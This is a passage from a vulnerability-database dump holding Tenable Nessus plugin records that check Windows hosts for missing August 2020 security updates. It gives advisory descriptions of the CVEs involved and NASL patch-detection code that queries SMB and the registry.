value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-08';\nkbs = make_list(\n '4571703',\n '4571723'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (!\n (smb_check_rollup(os:'6.3',\n sp:0,\n rollup_date:'08_2020',\n bulletin:bulletin,\n rollup_kb_list:[4571703, 4571723])\n )\n)\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\nelse\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\n\n\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:22:18", 
"description": "The remote Windows host is missing security update 4571694.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1492, CVE-2020-1525, CVE-2020-1554)\n\n - A remote code execution vulnerability exists when Windows Media Audio Codec improperly handles objects. An attacker who successfully exploited the vulnerability could take control of an affected system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Audio Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-1511)\n\n - An elevation of privilege vulnerability exists in the way that the srmsvc.dll handles objects in memory. 
An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1475)\n\n - An elevation of privilege vulnerability exists when the Windows CDP User Components improperly handle memory.\n (CVE-2020-1549, CVE-2020-1550)\n\n - An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An elevation of privilege vulnerability exists when the Windows Network Connection Broker improperly handles memory. (CVE-2020-1526)\n\n - An information disclosure vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system (CVE-2020-1383)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the Windows Custom Protocol Engine improperly handles memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists when the Storage Service improperly handles file operations. 
An attacker who successfully exploited this vulnerability could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists when the Windows Speech Runtime improperly handles memory.\n (CVE-2020-1521, CVE-2020-1522)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - A denial of service vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RD Gateway service on the target system to stop responding.\n (CVE-2020-1466)\n\n - An elevation of privilege vulnerability exists in the Local Security Authority Subsystem Service (LSASS) when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause an elevation of privilege on the target system's LSASS service. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the Windows Font Driver Host improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Windows Font Driver Host handles memory. 
(CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - An information disclosure vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when the Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1486, CVE-2020-1566)\n\n - An elevation of privilege vulnerability exists when the Windows File Server Resource Management Service improperly handles memory. (CVE-2020-1517, CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the way that the dnsrslvr.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. 
An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - An elevation of privilege vulnerability exists when ASP.NET or .NET web applications running on IIS improperly allow access to cached files. An attacker who successfully exploited this vulnerability could gain access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when the Windows Remote Access improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the \"Public Account Pictures\" folder improperly handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when Microsoft Edge PDF Reader improperly handles objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC). 
An attacker who successfully exploited the vulnerability could run a specially crafted application on a device on the network. (CVE-2020-1472)\n\n - An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory. An attacker who successfully exploited the vulnerability could gain elevated privileges on a targeted system. A locally authenticated attacker could exploit this vulnerability by running a specially crafted application. The security update addresses the vulnerability by helping to ensure that the Windows Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the Windows Image Acquisition (WIA) Service improperly discloses contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the Windows Ancillary Function Driver for WinSock improperly handles memory. (CVE-2020-1587)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. 
(CVE-2020-1473, CVE-2020-1557, CVE-2020-1558, CVE-2020-1564)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes input. An attacker who successfully exploited this vulnerability could take control of an affected system. (CVE-2020-1046)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1529)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the Windows Function Discovery SSDP Provider improperly handles memory. (CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. 
(CVE-2020-1561, CVE-2020-1562)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files. In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded. 
The update addresses the vulnerability by correcting how Windows validates file signatures.\n (CVE-2020-1464)", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "nessus", "title": "KB4571694: Windows 10 Version 1607 and Windows Server 2016 August 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1046", "CVE-2020-1337", "CVE-2020-1339", "CVE-2020-1377", "CVE-2020-1378", "CVE-2020-1379", "CVE-2020-1380", "CVE-2020-1383", "CVE-2020-1464", "CVE-2020-1466", "CVE-2020-1467", "CVE-2020-1470", "CVE-2020-1472", "CVE-2020-1473", "CVE-2020-1474", "CVE-2020-1475", "CVE-2020-1476", "CVE-2020-1477", "CVE-2020-1478", "CVE-2020-1484", "CVE-2020-1485", "CVE-2020-1486", "CVE-2020-1487", "CVE-2020-1488", "CVE-2020-1489", "CVE-2020-1490", "CVE-2020-1492", "CVE-2020-1509", "CVE-2020-1511", "CVE-2020-1512", "CVE-2020-1513", "CVE-2020-1515", "CVE-2020-1516", "CVE-2020-1517", "CVE-2020-1518", "CVE-2020-1519", "CVE-2020-1520", "CVE-2020-1521", "CVE-2020-1522", "CVE-2020-1525", "CVE-2020-1526", "CVE-2020-1527", "CVE-2020-1529", "CVE-2020-1530", "CVE-2020-1531", "CVE-2020-1533", "CVE-2020-1534", "CVE-2020-1537", "CVE-2020-1538", "CVE-2020-1549", "CVE-2020-1550", "CVE-2020-1552", "CVE-2020-1553", "CVE-2020-1554", "CVE-2020-1556", "CVE-2020-1557", "CVE-2020-1558", "CVE-2020-1561", "CVE-2020-1562", "CVE-2020-1564", "CVE-2020-1565", "CVE-2020-1566", "CVE-2020-1567", "CVE-2020-1568", "CVE-2020-1570", "CVE-2020-1577", "CVE-2020-1579", "CVE-2020-1584", "CVE-2020-1587"], "modified": "2023-05-23T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_AUG_4571694.NASL", "href": "https://www.tenable.com/plugins/nessus/139488", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139488);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\n \"CVE-2020-1046\",\n \"CVE-2020-1337\",\n \"CVE-2020-1339\",\n \"CVE-2020-1377\",\n \"CVE-2020-1378\",\n \"CVE-2020-1379\",\n \"CVE-2020-1380\",\n \"CVE-2020-1383\",\n \"CVE-2020-1464\",\n \"CVE-2020-1466\",\n \"CVE-2020-1467\",\n \"CVE-2020-1470\",\n \"CVE-2020-1472\",\n \"CVE-2020-1473\",\n \"CVE-2020-1474\",\n \"CVE-2020-1475\",\n \"CVE-2020-1476\",\n \"CVE-2020-1477\",\n \"CVE-2020-1478\",\n \"CVE-2020-1484\",\n \"CVE-2020-1485\",\n \"CVE-2020-1486\",\n \"CVE-2020-1487\",\n \"CVE-2020-1488\",\n \"CVE-2020-1489\",\n \"CVE-2020-1490\",\n \"CVE-2020-1492\",\n \"CVE-2020-1509\",\n \"CVE-2020-1511\",\n \"CVE-2020-1512\",\n \"CVE-2020-1513\",\n \"CVE-2020-1515\",\n \"CVE-2020-1516\",\n \"CVE-2020-1517\",\n \"CVE-2020-1518\",\n \"CVE-2020-1519\",\n \"CVE-2020-1520\",\n \"CVE-2020-1521\",\n \"CVE-2020-1522\",\n \"CVE-2020-1525\",\n \"CVE-2020-1526\",\n \"CVE-2020-1527\",\n \"CVE-2020-1529\",\n \"CVE-2020-1530\",\n \"CVE-2020-1531\",\n \"CVE-2020-1533\",\n \"CVE-2020-1534\",\n \"CVE-2020-1537\",\n \"CVE-2020-1538\",\n \"CVE-2020-1549\",\n \"CVE-2020-1550\",\n \"CVE-2020-1552\",\n \"CVE-2020-1553\",\n \"CVE-2020-1554\",\n \"CVE-2020-1556\",\n \"CVE-2020-1557\",\n \"CVE-2020-1558\",\n \"CVE-2020-1561\",\n \"CVE-2020-1562\",\n \"CVE-2020-1564\",\n \"CVE-2020-1565\",\n \"CVE-2020-1566\",\n \"CVE-2020-1567\",\n \"CVE-2020-1568\",\n \"CVE-2020-1570\",\n \"CVE-2020-1577\",\n \"CVE-2020-1579\",\n \"CVE-2020-1584\",\n \"CVE-2020-1587\"\n );\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"IAVA\", value:\"2020-A-0361-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0367-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0370-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n 
script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"MSKB\", value:\"4571694\");\n script_xref(name:\"MSFT\", value:\"MS20-4571694\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"KB4571694: Windows 10 Version 1607 and Windows Server 2016 August 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4571694.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1379,\n CVE-2020-1477, CVE-2020-1478, CVE-2020-1492,\n CVE-2020-1525, CVE-2020-1554)\n\n - A remote code execution vulnerability exists when\n Windows Media Audio Codec improperly handles objects. 
An\n attacker who successfully exploited the vulnerability\n could take control of an affected system. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media Audio\n Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-1511)\n\n - An elevation of privilege vulnerability exists in the\n way that the srmsvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1475)\n\n - An elevation of privilege vulnerability exists when the\n Windows CDP User Components improperly handle memory.\n (CVE-2020-1549, CVE-2020-1550)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. 
There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An elevation of privilege vulnerability exists when the\n Windows Network Connection Broker improperly handles\n memory. (CVE-2020-1526)\n\n - An information disclosure vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system (CVE-2020-1383)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the\n Windows Custom Protocol Engine improperly handles\n memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists when the\n Storage Service improperly handles file operations. An\n attacker who successfully exploited this vulnerability\n could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists when the\n Windows Speech Runtime improperly handles memory.\n (CVE-2020-1521, CVE-2020-1522)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the\n Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. 
An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - A denial of service vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an attacker\n connects to the target system using RDP and sends\n specially crafted requests. An attacker who successfully\n exploited this vulnerability could cause the RD Gateway\n service on the target system to stop responding.\n (CVE-2020-1466)\n\n - An elevation of privilege vulnerability exists in the\n Local Security Authority Subsystem Service (LSASS) when\n an authenticated attacker sends a specially crafted\n authentication request. A remote attacker who\n successfully exploited this vulnerability could cause an\n elevation of privilege on the target system's LSASS\n service. The security update addresses the vulnerability\n by changing the way that LSASS handles specially crafted\n authentication requests. (CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the\n Windows Font Driver Host improperly handles memory. An\n attacker who successfully exploited the vulnerability\n would gain execution on a victim system. The security\n update addresses the vulnerability by correcting how the\n Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - An information disclosure vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way the\n Windows State Repository Service handles objects in\n memory. 
(CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when the\n Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1486, CVE-2020-1566)\n\n - An elevation of privilege vulnerability exists when the\n Windows File Server Resource Management Service\n improperly handles memory. (CVE-2020-1517,\n CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the\n way that the dnsrslvr.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - An elevation of privilege vulnerability exists when\n ASP.NET or .NET web applications running on IIS\n improperly allow access to cached files. An attacker who\n successfully exploited this vulnerability could gain\n access to restricted files. 
(CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when the\n Windows Remote Access improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge PDF Reader improperly handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC). An attacker who\n successfully exploited the vulnerability could run a\n specially crafted application on a device on the\n network. (CVE-2020-1472)\n\n - An elevation of privilege vulnerability exists when the\n Windows Kernel API improperly handles registry objects\n in memory. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a\n targeted system. A locally authenticated attacker could\n exploit this vulnerability by running a specially\n crafted application. 
The security update addresses the\n vulnerability by helping to ensure that the Windows\n Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the\n Windows Print Spooler service improperly allows\n arbitrary writing to the file system. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the\n Windows Image Acquisition (WIA) Service improperly\n discloses contents of its memory. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the\n Windows Ancillary Function Driver for WinSock improperly\n handles memory. (CVE-2020-1587)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558,\n CVE-2020-1564)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes input. An attacker\n who successfully exploited this vulnerability could take\n control of an affected system. (CVE-2020-1046)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. 
An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-1529)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the\n Windows Function Discovery SSDP Provider improperly\n handles memory. (CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1561, CVE-2020-1562)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. 
The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when\n Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly\n validates file signatures. An attacker who successfully\n exploited this vulnerability could bypass security\n features and load improperly signed files. In an attack\n scenario, an attacker could bypass security features\n intended to prevent improperly signed files from being\n loaded. The update addresses the vulnerability by\n correcting how Windows validates file signatures.\n (CVE-2020-1464)\");\n # https://support.microsoft.com/en-us/help/4571694/windows-10-update-kb4571694\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1446acfc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4571694.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1564\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n 
